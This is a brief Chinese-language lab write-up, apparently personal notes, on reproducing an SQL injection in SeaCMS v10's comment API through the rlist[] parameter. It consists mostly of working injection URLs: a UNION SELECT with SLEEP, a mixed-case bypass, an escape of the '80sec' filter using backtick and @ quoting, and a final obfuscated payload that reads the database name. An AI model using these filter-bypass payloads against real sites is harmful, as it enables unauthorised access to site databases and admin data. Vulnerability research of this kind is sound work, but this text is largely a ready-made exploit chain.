1、环境:seacmsv10 2、注入:http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=gzm 占位符:gzm phpstorm调试,查看执行语句,在mysql拼接语句复现。 3、重新注入:http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1)union%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20# 发现,没有对大小写处理。 4、使用大小写绕过,重新注入:http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1)UnIon%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20# 任然被过滤了,从80sec入手 5、利用80sec注入http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1%20or%20@`%27`%20UnIon%20select%201,2,3,4,5,6,7,8,9,10,11`%27`#' 成功逃逸 8、再次注入:http://www.seacmsv10.com/comment/api/index.php/comment/api/index.php?gid=1&page=2&type=1&rlist[]=1)//@**@`%27`**//unIoN--%0ASELECT%23%0A1,2,3,4,5,6,7,8,9,10,database()%23%0Afrom%23%0Asea_admin--%20%27 调试过程 成功回显数据库名